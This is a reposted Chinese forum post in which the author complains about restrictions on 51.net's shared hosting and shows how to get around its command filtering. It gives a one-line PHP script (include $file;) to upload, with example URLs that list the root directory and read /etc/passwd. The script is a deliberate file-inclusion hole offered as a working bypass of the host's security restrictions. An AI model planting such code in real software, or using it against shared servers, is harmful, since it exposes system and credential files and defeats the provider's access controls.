[转载]如何突破51.net的命令过滤
文章作者:analysist说实话,51.net挺让我伤心的,虽然我已经用了它的虚拟主机服务将近一年,但还没有一次成功SSH上去修改我的密码,也许是我笨,
但是我真的那么笨吗?即使我有那么笨, 为什么我给你们发信询问这个问题却始终没有收到回信呢?还有你们那些恶心的权限设置, 为
什么我只能对我自己的主目录拥有写权限却没有删除权限?上次一个网友由于误操作把一个文件放在我的主目录的根目录下面,但我却无
法删除,真是窝火!还有你们的CGI设置,为什么我的Perl程序在别的服务器上运行一切正常,到了你们的服务器却一点结果都不输出?
最近,你们又把很多系统命令过滤掉了,象"ls","cat","id"之类的命令根本没有任何输出,太过分了吧?!算了算了, 与其怨天
尤人,不如我们自己考虑一下如何突破这些限制。下面我主要讲述如何突破"ls"和"cat",至于其它的命令,大家自己考虑吧。
要突破51.net的命令过滤,我们需要写下面一个小的脚本,然后上传到51.net你的主目录中。
cmd.php:
<?php
include $file;
?>
如果你想实现"ls /"命令,那么输入"http://***.51.net/cmd.php?file=/":
访问链接图片...
如果你想实现"cat /etc/passwd"命令,那么输入"http://***.51.net/cmd.php?file=/etc/passwd":
访问链接图片...
其它的命令过滤能否突破,就看大家啦!:)
页:
[1]